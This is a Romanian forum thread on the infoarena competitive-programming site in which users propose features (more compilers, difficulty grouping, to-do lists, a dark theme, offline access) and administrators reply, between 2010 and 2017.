Scuze daca repet dar de ce nu apare borland c la limbaje?  :readthis: Nu mi se pare normal ca un compilator foarte raspandit in scoli (borland c) sa nu apara pe lista  :thumbdown:


Titlul: Răspuns: Feature request
Scris de: Pripoae Teodor Anton din Martie 05, 2010, 16:01:49
Citat
Scuze daca repet dar de ce nu apare borland c la limbaje?   Nu mi se pare normal ca un compilator foarte raspandit in scoli (borland c) sa nu apara pe lista 
Borland C este un limbaj compilator invechit, care de anul viitor nu va mai fi folosit la olimpiada, si era folosit in licee pentru ca profesorii nu erau informati cu existenta compilatoarelor moderne. Evaluatorul infoarena ruleaza pe linux deci nu suporta borland.


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Martie 05, 2010, 23:27:51
Scuze daca repet dar de ce nu apare borland c la limbaje?  :readthis: Nu mi se pare normal ca un compilator foarte raspandit in scoli (borland c) sa nu apara pe lista  :thumbdown:

Mie nu mi se pare normal ca in scoli sa existe Borland :p.


Titlul: Răspuns: Feature request
Scris de: Frunza Adriana din Aprilie 11, 2010, 15:58:07
Cred ca ar fi utila la Arhiva de probleme gruparea lor pe clase de dificultate, adica cele cu 1 stea intr-o grupa, cele cu 2 stele in alta si tot asa. Si asa, parerea mea, utilizatorul va putea gasi mai usor gradul de dificultate al problemei care se potriveste cunostintelor sale. Sa zicem ca eu cred ca pot rezolva o problema ce are ca si grad de dificultate 5 stelute - daca exista o asemenea problema pe site - dar cum nu se afla pe prima pagina, trebuie sa o caut si poate nu se afla nici pe a 2-a.


Stiu ca sunt multe de realizat la acest site si ca toata echipa a facut o treaba super tare si a muncit din greu, dar cred ca stiti deja ca toti programatorii interesati de algoritmica, structuri de date si alte cele de genul asta nu va putea sa va multumeasca indejuns si nu va veti supara pe ideile noastre bune sau nu.


Titlul: Răspuns: Feature request
Scris de: Paul-Dan Baltescu din Aprilie 11, 2010, 21:52:43
Asta intentionam sa facem si noi, dar intai am vrea sa terminam de acordat stelute problemelor. :)


Titlul: Răspuns: Feature request
Scris de: Alexandru-Iancu Caragicu din Aprilie 14, 2010, 16:57:44
In toate clasamentele, daca existi in clasament, sa existe un link care sa te duca la pozitia ta in clasament.


Titlul: Răspuns: Feature request
Scris de: Simoiu Robert din Aprilie 27, 2010, 14:43:09
As vrea daca se poate sa se introduca din nou posibilitatea adaugarii unei semnaturi.


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Aprilie 27, 2010, 17:47:16
As vrea daca se poate sa se introduca din nou posibilitatea adaugarii unei semnaturi.
S-a mai cerut/intrebat: chestia asta a ramas de pe vremea forumului vechi, ca si data de nastere. A apus si se pare ca nu mai poate reveni.

R.I.P :)


Titlul: Răspuns: Feature request
Scris de: Dragos-Alin Rotaru din Aprilie 27, 2010, 21:21:33
Cand o sa puneti si statistici la fiecare problema, gen (nr utilizatori cu 100P) / (nr utilizatori cu punctaj < 100P) ? :D


Titlul: Răspuns: Feature request
Scris de: Stefan Zamfira din Iunie 04, 2010, 20:53:45
Salut, sunt nou pe infoarena si din dorinta de a-mi evalua cunostintele curente m-am apucat sa "sap" prin listele de probleme prezente pe site, lucru care mi-a dat o idee. Sa fiu mai explicit : eu vad problema x, citesc enuntul si-mi suna interesant. Din pricina timpului/locului unde ma aflu etc, nu ma pot apuca instant de lucru asa ca voi fi nevoit sa adaug linkul in bookmarks. Ce se va intampla daca eu am 5-10-20 probleme "want to solve"? Personal cred ca adaugarea unui buton "Add in to do list" (sau ceva de genul) pe fiecare pagina si creerea in profilul fiecarui user un "to do list" ar fi foarte utila, astfel fiecare user va avea o lista cu probleme pe care vrea sa le rezolve. Evident, de aici se pot dezvolta mai multe chestii, ca de exemplu "share" etc.

PS : Nu am avut timp sa citesc toate propunerile postate aici, imi cer scuze daca s-a mai discutat despre acest lucru


Titlul: Răspuns: Feature request
Scris de: Petru Trimbitas din Iunie 04, 2010, 21:14:53
Parca este ceva de genu' pe campion


Titlul: Răspuns: Feature request
Scris de: Ionescu Victor Cristian din Iunie 04, 2010, 21:20:00
da ... suna destul de bine ideea asta. cred ca ar usura programul de pregatire al multor useri   :ok:


Titlul: Răspuns: Feature request
Scris de: Cezar Mocan din Iunie 04, 2010, 21:20:33
Nu stiu daca este pe campion, dar si mie mi-ar placea sa fie o chestie dinasta cum zice Stefan. Sa vedem ce parere au cei din echipa :)


Titlul: Răspuns: Feature request
Scris de: Petru Trimbitas din Iunie 04, 2010, 21:49:34
stiu sa o fac eu in php. Cred ca e f. Simplu. Trebuie adaugata o linie in tabelul in care sunt mem userii


Titlul: Răspuns: Feature request
Scris de: Pripoae Teodor Anton din Iunie 04, 2010, 22:02:56
Nu chiar, trebuie creat un tabel separat, unde sa ai link-uri care sa pointeze catre un user si o problema. M-as baga eu sa implementez treaba asta


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Iunie 05, 2010, 02:05:30
In mod oficial site-ul infoarena 2 a intrat in maintenance mode (nu se mai aduc feature-uri noi, doar se intretine site-ul). Echipa infoarena a luat aceasta decizie pentru a se putea concentra mai bine pe dezvoltarea unei noi versiuni, infoarena 3 :). In noua versiunea a site-ului vom lua in calcul toate feature-urile pe care voi le-ati propus aici, asa ca spuneti tot ce aveti :D


Titlul: Răspuns: Feature request
Scris de: Simoiu Robert din Iunie 14, 2010, 12:53:34
Am totusi o intrebare : o sa se pastreze sursele de pe infoarena 2 ?


Titlul: Răspuns: Feature request
Scris de: Pripoae Teodor Anton din Iunie 14, 2010, 22:35:11
Da.


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Iunie 14, 2010, 22:56:08
De fapt echipa infoarena nu a luat inca nici o decizie asupra acestui lucru. Daca vreti sa fiti sigur ca nu va pierdeti sursele de pe infoarena 2 ar fi bine sa vi le salvati din timp.


Titlul: Răspuns: Feature request
Scris de: Gheorghe Cosmin din Iunie 15, 2010, 07:41:33
Tibi, in mare parte am vrea sa pastram toate datele din infoarena2, nu speria lumea ca trebuie sa isi salveze o groaza de surse. :P


Titlul: Răspuns: Feature request
Scris de: Andrei Homorodean din Iunie 20, 2010, 22:55:45
In mod oficial site-ul infoarena 2 a intrat in maintenance mode (nu se mai aduc feature-uri noi, doar se intretine site-ul). Echipa infoarena a luat aceasta decizie pentru a se putea concentra mai bine pe dezvoltarea unei noi versiuni, infoarena 3 :). In noua versiunea a site-ului vom lua in calcul toate feature-urile pe care voi le-ati propus aici, asa ca spuneti tot ce aveti :D

Tare! Exista vreo pagina unde se discuta despre infoarena 3? Vreti sa folositi un framework existent? Tot php?

As propune un feature care permite unui user sa-si exporte toate sursele de pe infoarena, daca tot este speriata lumea de pierderea acestora. As vrea sa implementez eu asta, daca se poate. :)


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Iunie 20, 2010, 23:07:12
In mod oficial site-ul infoarena 2 a intrat in maintenance mode (nu se mai aduc feature-uri noi, doar se intretine site-ul). Echipa infoarena a luat aceasta decizie pentru a se putea concentra mai bine pe dezvoltarea unei noi versiuni, infoarena 3 :). In noua versiunea a site-ului vom lua in calcul toate feature-urile pe care voi le-ati propus aici, asa ca spuneti tot ce aveti :D

Tare! Exista vreo pagina unde se discuta despre infoarena 3? Vreti sa folositi un framework existent? Tot php?

As propune un feature care permite unui user sa-si exporte toate sursele de pe infoarena, daca tot este speriata lumea de pierderea acestora. As vrea sa implementez eu asta, daca se poate. :)

Inca nu stim daca formatul bazei de date IA3 va fi la fel ca IA2 sau radical diferit, dar in ambele cazuri ar fi nevoie de un script de importare a surselor din ce exporta scriptul gandit de tine. De ce sa importam dintr-un fisier cand putem sa importam direct din baza de date? Aceiasi cantitate de munca trebuie depusa.
Prin urmare, nu va speriati, o sa importam sursele din IA2.


Titlul: Răspuns: Răspuns: Feature request
Scris de: Andrei Homorodean din Iunie 21, 2010, 03:56:29
In mod oficial site-ul infoarena 2 a intrat in maintenance mode (nu se mai aduc feature-uri noi, doar se intretine site-ul). Echipa infoarena a luat aceasta decizie pentru a se putea concentra mai bine pe dezvoltarea unei noi versiuni, infoarena 3 :). In noua versiunea a site-ului vom lua in calcul toate feature-urile pe care voi le-ati propus aici, asa ca spuneti tot ce aveti :D

Tare! Exista vreo pagina unde se discuta despre infoarena 3? Vreti sa folositi un framework existent? Tot php?

As propune un feature care permite unui user sa-si exporte toate sursele de pe infoarena, daca tot este speriata lumea de pierderea acestora. As vrea sa implementez eu asta, daca se poate. :)

Inca nu stim daca formatul bazei de date IA3 va fi la fel ca IA2 sau radical diferit, dar in ambele cazuri ar fi nevoie de un script de importare a surselor din ce exporta scriptul gandit de tine. De ce sa importam dintr-un fisier cand putem sa importam direct din baza de date? Aceiasi cantitate de munca trebuie depusa.
Prin urmare, nu va speriati, o sa importam sursele din IA2.

In linii mari, n-am prea inteles nimic din ce zici tu acolo :)

Eu ma refeream strict la un script care-i permite unui user logat sa-si extraga o arhiva cu sursele sale. Probabil ca o sa fac initial un script care sa faca crawl si nu sa lucreze cu baza de date. Sa vad cand o sa am timp liber. :)


Titlul: Răspuns: Feature request
Scris de: Dragos-Alin Rotaru din Iunie 24, 2010, 19:53:22
Ar fi frumos daca am avea la fiecare sortare dupa un autor si tab-urile cu probleme rezolvate / incercate
LE: Iar in clasamente, user-ul respectivului sa fie subliniat sau scos in evidenta, pentru a se "identifica" mai usor pe el :)


Titlul: Răspuns: Feature request
Scris de: A Cosmina - vechi din Iunie 28, 2010, 06:19:09
M-am gandit ca poate s-ar putea face pentru fiecare problema o diagrama care sa arate de cati useri au rezolvat problema si cati nu. Ceva de acest gen :

(http://i50.tinypic.com/2lbnnfr.jpg)                                (http://i49.tinypic.com/2wolqnt.jpg)





Titlul: Răspuns: Feature request
Scris de: Petenchea Alexandru din Decembrie 03, 2011, 12:17:50
Am vazut ca aveti Ubuntu pe server. Evaluatorul foloseste g++ 4.4.3 . Recent la C++ au mai fost adaugate cateva facilitati noi (C++0x), de exemplu nullptr (in loc sa folosim constanta NULL, acesta este un keyword). Poate vi se pare o prostie sugestia mea, dar cred ca ar ajuta putin g++ 4.6.1 , care "stie" C++ 11 .


Titlul: Răspuns: Feature request
Scris de: Marginean Ninu Ciprian din Decembrie 03, 2011, 19:58:10
Nu prea "stie" :-'


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Decembrie 03, 2011, 20:39:08
Probabil ca vom trece si noi pe noul standard C++ in momentul in care vom vedea ca se va face schimbarea la nivelul competitiilor internationale.


Titlul: Răspuns: Feature request
Scris de: Petenchea Alexandru din Decembrie 03, 2011, 22:58:26
@MCiprianM Nu inteleg ce vrei sa spui :-s Eu folosesc 4.6.1 tot pe Ubuntu (11.10). Include suport pentru C++ 11, dar trebuie sa ai ca argument -std=c++0x , daca la asta te refereai :P


Titlul: Răspuns: Feature request
Scris de: Marginean Ninu Ciprian din Decembrie 04, 2011, 13:38:43
Pentru language features, poti sa te uiti aici (http://gcc.gnu.org/projects/cxx0x.html).
Pentru librarii aici (http://gcc.gnu.org/onlinedocs/libstdc++/manual/status.html#status.iso.200x).
Inca mai sunt destul de multe chestii neimplementate.
Si citat de pe pagina de la primul link:
"GCC's support for C++11 is still experimental."

Mai trebuie sa treaca ceva timp pana sa fie adoptat noul standard. Inclusiv de catre olimpiada.


Titlul: Răspuns: Feature request
Scris de: Laurentiu Ion din Februarie 27, 2012, 15:07:20
Ar fi super sa avem ceva gen IDEone sau Cloud9 IDE sa putem scrie si compila cod aici  :weightlift:

sau macar pentru inceput doar editor si syntax highlighter :D (pana si timus are textbox pentru submit, nu doar "Choose file")


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Februarie 27, 2012, 15:51:15
Nu te oferi tu sa integrezi un editor? Putem vorbi pe Facebook pentru mai multe detalii.


Titlul: Răspuns: Feature request
Scris de: Laurentiu Ion din Februarie 27, 2012, 16:01:01
dupa olimpiade :D


Titlul: Răspuns: Feature request
Scris de: Aurelian Tutuianu din Martie 02, 2012, 15:25:59
Salut,
Stiu ca s-a mai discutat dar am vazut ca mesajele despre acest lucru sunt destul de vechi. Luati in calcul si adaugarea Java? Ma ofer sa ajut cu integrarea lui daca este cazul. Nu stiu ce chestii se folosesc pe acolo dar imi imaginez ca nu poate fi chiar atat de greu.
Multumesc


Titlul: Răspuns: Feature request
Scris de: Buleandra Cristian din Martie 02, 2012, 16:50:10
Salut,
Stiu ca s-a mai discutat dar am vazut ca mesajele despre acest lucru sunt destul de vechi. Luati in calcul si adaugarea Java? Ma ofer sa ajut cu integrarea lui daca este cazul. Nu stiu ce chestii se folosesc pe acolo dar imi imaginez ca nu poate fi chiar atat de greu.
Multumesc

Pai momentan cel mai mult infoarena este folosit pentru pregatirea pentru olimpiada de informatica, la care limbajul de programare este C++ . Nu stiu cati useri care sunt acuma pe site si-ar dori mai bine sa lucreze in Java (probabil doar pentru a invata chestile de baza, nu pentru a rezolva probleme complicate in java) . Nici pe topcoder nu cred ca sunt multi romani care codeaza in java...


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Martie 02, 2012, 16:52:53
Salut,
Stiu ca s-a mai discutat dar am vazut ca mesajele despre acest lucru sunt destul de vechi. Luati in calcul si adaugarea Java? Ma ofer sa ajut cu integrarea lui daca este cazul. Nu stiu ce chestii se folosesc pe acolo dar imi imaginez ca nu poate fi chiar atat de greu.
Multumesc

Introducerea limbajului Java reprezinta unul din principalele noastre obiective pe partea de development.

http://infoarena.ro/development


Titlul: Răspuns: Feature request
Scris de: Petenchea Alexandru din Martie 29, 2012, 10:13:50
Ar fi interesant daca la fiecare problema ar aparea cea mai eficienta sursa trimisa (in principiu ca timp). Adica daca timpul de executie adunat de la toate testele este cel mai mic, sursa respectiva sa fie considerata cea mai eficienta  :D


Titlul: Răspuns: Feature request
Scris de: George Marcus din Martie 29, 2012, 12:38:57
Asta s-ar putea sa incurajeze surse gen "if(N == 15) printf("12542");"


Titlul: Răspuns: Feature request
Scris de: Laurentiu Ion din Martie 29, 2012, 12:51:23
Ar fi interesant daca la fiecare problema ar aparea cea mai eficienta sursa trimisa (in principiu ca timp). Adica daca timpul de executie adunat de la toate testele este cel mai mic, sursa respectiva sa fie considerata cea mai eficienta  :D

Sau mai degraba adaugata sortare dupa timp de executie/dimensiune sursa/memorie...  8)


Titlul: Răspuns: Feature request
Scris de: Dumitru Andrei Georgian din Mai 29, 2012, 20:38:09
In statisticile de la profil nu apare nimic despre problemele de la monthly. Ati putea sa faceti o rubrica si pentru problemele de la monthly?


Titlul: Răspuns: Răspuns: Feature request
Scris de: Aurelian Tutuianu din Iunie 13, 2012, 09:54:48
Salut,
Stiu ca s-a mai discutat dar am vazut ca mesajele despre acest lucru sunt destul de vechi. Luati in calcul si adaugarea Java? Ma ofer sa ajut cu integrarea lui daca este cazul. Nu stiu ce chestii se folosesc pe acolo dar imi imaginez ca nu poate fi chiar atat de greu.
Multumesc

Pai momentan cel mai mult infoarena este folosit pentru pregatirea pentru olimpiada de informatica, la care limbajul de programare este C++ . Nu stiu cati useri care sunt acuma pe site si-ar dori mai bine sa lucreze in Java (probabil doar pentru a invata chestile de baza, nu pentru a rezolva probleme complicate in java) . Nici pe topcoder nu cred ca sunt multi romani care codeaza in java...

Asa este. In umila mea opinie insa acesta e un lucru care trebuie schimbat. Schimbat nu in sensul de a fi inlocuit, nici pe departe. Ci in sensul de a fi imbogatit. De a atrage cat mai multi oameni in a ramane implicati in acest fenomen.


Titlul: Răspuns: Feature request
Scris de: Aurelian Tutuianu din Iunie 13, 2012, 10:02:46
Introducerea limbajului Java reprezinta unul din principalele noastre obiective pe partea de development.

http://infoarena.ro/development
Aveti vre-o estimare cu privire la acest lucru? Stiu ca tot ce faceti este voluntar si apreciez enorm acest lucru. Vreau doar sa imi fac o idee.
Eu am lucrat acum cativa ani (multi ani) in urma cu C++, dar am uitat aproape complet. Am incercat sa ma pun la punct. Dar la fiecare participare la cate un concurs pe aici am trait mereu frustrarea de a muri cu ideile bune in mana fiindca consumam timp ba sa sortez o treaba, ba ma trezeam ca seturile se comporta altfel decat imi imaginam, ba ca uitam cate o initializare cu 0 sau mai stiu eu ce alte prostii. De aceea am si renuntat sa mai particip cumva, pentru ca nu vad nici un beneficiu in a consuma zeci de ore pentru a ma pune la punct in C++ de exemplu, cand in Java nu pierd nici o fractiune de secunda cu nedumeriri de implementare.


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Iunie 14, 2012, 02:12:58
Java reprezinta acum o chestie destul de complicata de adaugat. Codul sursa e vizibil pe net, rulam totul intr-un jail facut C, care insa e cam rudimentar. Deocamdata nu prea am gasit pe nimeni sa se priceapa si sa aiba timp sa adauge si Java.


Titlul: Răspuns: Feature request
Scris de: Gabriel Bitis din Iunie 15, 2012, 14:15:44
Nu s-ar putea adauga o optiune la forum pentru moderatori sa poata stearge toate mesajele unui user? Apar frecvent boti care posteaza cate 20-30 de mesaje, si e nasol sa tot stergi pe ele.


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Iunie 16, 2012, 01:17:54
We'll look into it. Noi adminii putem si cand mai ave timp mai facem asta.


Titlul: Răspuns: Feature request
Scris de: Marginean Ninu Ciprian din August 09, 2012, 21:29:58
Avem urmatorul feature pe arhive: Daca ai luat 100 de puncte la o problema, poti vedea sursele celorlalti concurenti. Din pacate, poti vedea doar sursele care s-au trimis dupa concurs. Nu poti vedea si cele pe care le-au trimis ceilalti in timpul concursului. Ma intrebam daca ati putea adauga si feature-ul asta. Totusi nu vrem ca in timpul concursului, daca am luat 100 de puncte, sa putem vedea sursele celorlalti concurenti.

L.E.: M-am uitat putin in seara asta peste cod si din ce am vazut, banui ca linia 600 din /trunk/common/security.php trebuie transformata din:

Cod:
if (!$can_view_source && is_user_id($user['id']) && $job['round_type'] == "archive") {
in
Cod:
if (!$can_view_source && is_user_id($user['id']) && ($job['round_type'] == "archive" || $job['round_state'] == "complete") {

Nu prea am timp sa fac sync si submit asa ca va rog sa faceti voi daca considerati ca e ok. Multumesc!


Titlul: Răspuns: Feature request
Scris de: Radu-Andrei Szasz din Septembrie 13, 2012, 20:47:02
Mi s-ar parea util ca dupa un concurs sa se poata vedea sursele celorlalti concurenti(dupa modelul CodeForces, TopCoder). Astfel daca nu stim o problema, macar sa avem ceva de invatat de pe urma concursului.


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Septembrie 13, 2012, 20:48:53
Lumea in general discuta despre probleme pe forum asa ca ai sa poti sa o rezolvi cu acest ajutor. E mai util sai idei decat surse dupa care sa te uiti.
Dupa ce ai rezolvat o problema poti vedea toate sursele trimise la acea problema ca sa vezi cum au rezolvat-o altii.


Titlul: Răspuns: Feature request
Scris de: Radu-Andrei Szasz din Septembrie 13, 2012, 20:59:39
S-ar putea introduce macar posibilitatea de a vizualiza sursele trimise in timpul concursului odata ce este rezolvata problema in arhiva?


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Septembrie 13, 2012, 21:34:20
Da. Uitasem de asta. Am sa incerc sa ma ocup de asta in viitorul apropiat.


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Decembrie 03, 2012, 01:21:30
Am facut update la Syntax Highlighter 3. Acum aveti si limbajul python la acest macro.


Titlul: Răspuns: Feature request
Scris de: Marin Cristian din Ianuarie 20, 2014, 19:26:01
[Imbunatatire] La un anumit numar de puncte acumulate ati putea sa rasplatiti cu ceva efortul cu un cod de Steam/Nintendo Store(3DS/WiiU) pentru un joc ales de utilizator?  :D


Titlul: Răspuns: Feature request
Scris de: Adrian Craciun din Ianuarie 20, 2014, 22:13:14
Eu ma multumesc cu un lant de aur cu infoarena. Sa iti arati valoarea la dusmanii tai :banana:


Titlul: Răspuns: Feature request
Scris de: Emanuel Truta din Martie 10, 2014, 18:22:34
Nu stiu daca s-a mai cerut asta, dar si daca s-a cerut o mai cer eu o data.

Daca trimit o problema si la ea iau 90 de puncte (exemplu) si dupaia trimit inca o sursa care ia 30 de puncte, scorul la problema respectiva va fi 30 puncte, cand eu am luat si 90. As vrea sa ramana in memorie scorul maxim, nu ultimul scor.

Multumesc de atentie,
Manu.


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Martie 10, 2014, 18:25:11
Presupun ca te referi la arhiva, nu? Nu doar la scorul acela mic de pe pagina unei probleme.

Sistemul de conursuri trebuie refacut pentru asta. Din pacate la noi arhiva e tot un fel de concurs-live (unde nu putem lasa asta) care dureaza foarte foarte mult.

Am sa tin minte pentru viitor :-)


Titlul: Răspuns: Feature request
Scris de: Marron din Noiembrie 10, 2014, 13:46:20
Buna ziua !

O chestie interesanta ar fi o tema inchisa la culoare. De exemplu, eu lucrez in visual studio (cu tema neagra) si cand trec de pe visual studio (negru) pe infoarena (alb) devine deranjant pentru ochi. Mai mult, negru e mai badass !

Am incercat eu sa rescriu o tema pentru infoarena (vreo 30-40 minute), dar din moment ce nu detin cunostinte de css nu am reusit prea mult:
Screenshot 1: http://prntscr.com/54wns5
Screenshot 2: http://prntscr.com/54wnyi
Screenshot 3: http://prntscr.com/54wo45
Mai sunt chestii albe pe care nu am reusit sa le scot.
My CSS Code: http://pastebin.com/Xh0jX66A  (In caz ca vrea cineva sa se uite)

Deci... Mesajul acesta e un request pentru o tema inchisa la culoare, iar pana cand se implementeaza oficial pe site, fac request pentru un css (se poate instala usor cu extensia stylish: https://chrome.google.com/webstore/detail/stylish/fjnbnpbmkenffdnngjfgmeleoegfcffe) care sa inlocuiasca tema curenta.


Multumesc si sper sa se aprobe repede. :D (nu cred ca ar dura mult...)
O zi buna sa aveti !


Titlul: Răspuns: Feature request
Scris de: Vlad Rochian din August 05, 2015, 18:22:10
Nu știu dacă s-au mai postat chestii asemănătoare, dar mi s-ar părea ok să existe la "contul meu" o opțiune de a dezactiva notificările pe mail pentru mesajele private primite.
Mie personal mi se pare oarecum enervant să primești un mail nou de fiecare dată când ai mesaj de la cineva, și oricum intru mai des pe infoarena decât pe mail :)


Titlul: Răspuns: Feature request
Scris de: Dorel Gigel vrea contul sters. Mersi din August 16, 2015, 18:56:21
Salut,

Se poate o implementa o optiune pentru stergerea contului? Cu aceasta ocazie poate imi sterge si mie contul cineva.

Mersi!


Titlul: Răspuns: Feature request
Scris de: Marron din August 17, 2015, 09:21:22
Ar trebui sa fie si compilator de Python.


Titlul: Răspuns: Feature request
Scris de: Bucevschi Alexandru din Octombrie 18, 2015, 17:03:27
Salut. Daca tot e viu calendarul, nu puteti face o optiune gen "Add to Google Calendar"?


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Octombrie 21, 2015, 03:05:26
Pentru ca exista deja aceste 3 bune solutii:

Prima este o extensie de chrome:

https://chrome.google.com/webstore/detail/coders-calendar/bageaffklfkikjigoclfgengklfnidll?hl=en

A doua este o aplicatie de android:
https://play.google.com/store/apps/details?id=com.limitskyapps.CodingCalendar&hl=en

Si probabil ce iti doresti tu (are optiunea de Add to Google Calendar):
https://www.hackerrank.com/calendar


Titlul: Răspuns: Feature request
Scris de: Gafton Mihnea Alexandru din Ianuarie 14, 2016, 12:43:51
E vreo sansa sa putem folosi infoarena offline(probleme, articole, evaluator), urmand ca la prima conexiune de internet sa se sincronizeze versiunile?
sau ceva de genul asta


Titlul: Răspuns: Feature request
Scris de: Gafton Mihnea Alexandru din Ianuarie 20, 2016, 12:20:40
Ar fi o idee buna sa existe un fel de wishlist sau to do list, adica cand esti la o problema sa existe un buton prin care adaugi problema la wishlist si cand mergi pe profilul tau sa vezi acolo ce probleme ai(vrei sa le rezolvi in viitor)


Titlul: Răspuns: Feature request
Scris de: Valeriu Motroi din Ianuarie 20, 2016, 12:25:54
eu am rezolvat problema asta, făcând un grup pe facebok, unde îmi pun problemele/concursurile care să le rezolv cînd am timp. :ok:


Titlul: Răspuns: Feature request
Scris de: Adrian Budau din Ianuarie 24, 2016, 20:03:32
Sunt atatea chestii importante pe care am vrea sa le implementam, dar nu exista timp :-<. Insa wishlist-ul este un exemplu de proiect usor de implementat, fie ca pagina separata, fie ca aditie la infoarena chiar de catre tine (daca vrei sa vezi cum poti sa participi poti intra aici: https://hackers.infoarena.ro).

Iar referitor la variana offline, se poate face in asa fel incat sa ai acces la probleme si articole. Evaluatorul insa nu poate fi implementat offline, e foarte important ca toate sursele sa se evalueze pe acelasi calculator pentru ca toata lumea sa aiba "sanse" egale la punctaj maxim.


Titlul: Răspuns: Feature request
Scris de: George Marcus din Ianuarie 25, 2016, 14:27:51
Sunt atatea chestii importante pe care am vrea sa le implementam, dar nu exista timp :-<.
De ce nu le faci publice?

P.S.: Ma apucasem la un moment dat sa implementez submitul prin copy-paste, dar am inteles ca vreti sa includeti un editor de text mai inteligent.


Titlul: Răspuns: Feature request
Scris de: Gafton Mihnea Alexandru din Ianuarie 26, 2016, 10:05:25
Macar varinata offline cu probleme si articole ar fi foarte bine :D


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Ianuarie 26, 2016, 13:34:31
De ce ai nevoie de infoarena offline?


Titlul: Răspuns: Feature request
Scris de: Gafton Mihnea Alexandru din Ianuarie 26, 2016, 16:42:43
Pentru ca la mine la internat (unde stau) nu am indeajuns internet sa intru mereu pe browser, uneori deloc, si mi-ar fi foarte util sa pot citi probleme si sa ma gandesc la ele si sa ma apuc sa codez (cu tot cu eventualele comentarii si/sau articole cu solutii)  decat sa trebuiasca mereu sa sa imi fac fisiere in care sa imi copiez cerintele si restrictiile la cateva probleme (+ ca asa nu pot sa ma hotarasc ce probleme sa fac pe moment, trebuie sa imi planuiesc cu cel putin o zi inainte).
Si ma gandesc ca sunt si multi altii care ar  vrea sa aiba toata arhiva de probleme la indemana oricand si oriunde (calatorii, zone fara internet). : D


Titlul: Răspuns: Feature request
Scris de: SmileSmile din Decembrie 16, 2016, 20:11:25
Buna!

Ultima oara am folosit infoarena in liceu. Acum sunt studenta si as vrea sa reincep (de aceasta data mai serios) sa fac problemele de aici, pentru ca le consider mai grele decat cele de pe alte site-uri asemanatoare.

Ce am observat este ca nu avem optiunea de a trimite mai multe fisiere, intr-o arhiva. Cred ca ar fi un feature bun sa putem sa facem asta.


Titlul: Răspuns: Feature request
Scris de: Iancu Vlad din Septembrie 02, 2017, 14:19:07
Compilator pentru C# iar în loc de surse .cpp să trimitem solution-uri (fișiere .sln)


Titlul: Răspuns: Feature request
Scris de: Pirtoaca George Sebastian din Septembrie 28, 2017, 20:22:09
Exista vreo modalitate prin sa creezi un concurs virtual cu scoring ACM? De asemenea, se poat adauga probleme din "Arhiva ACM" la un concurs virtual?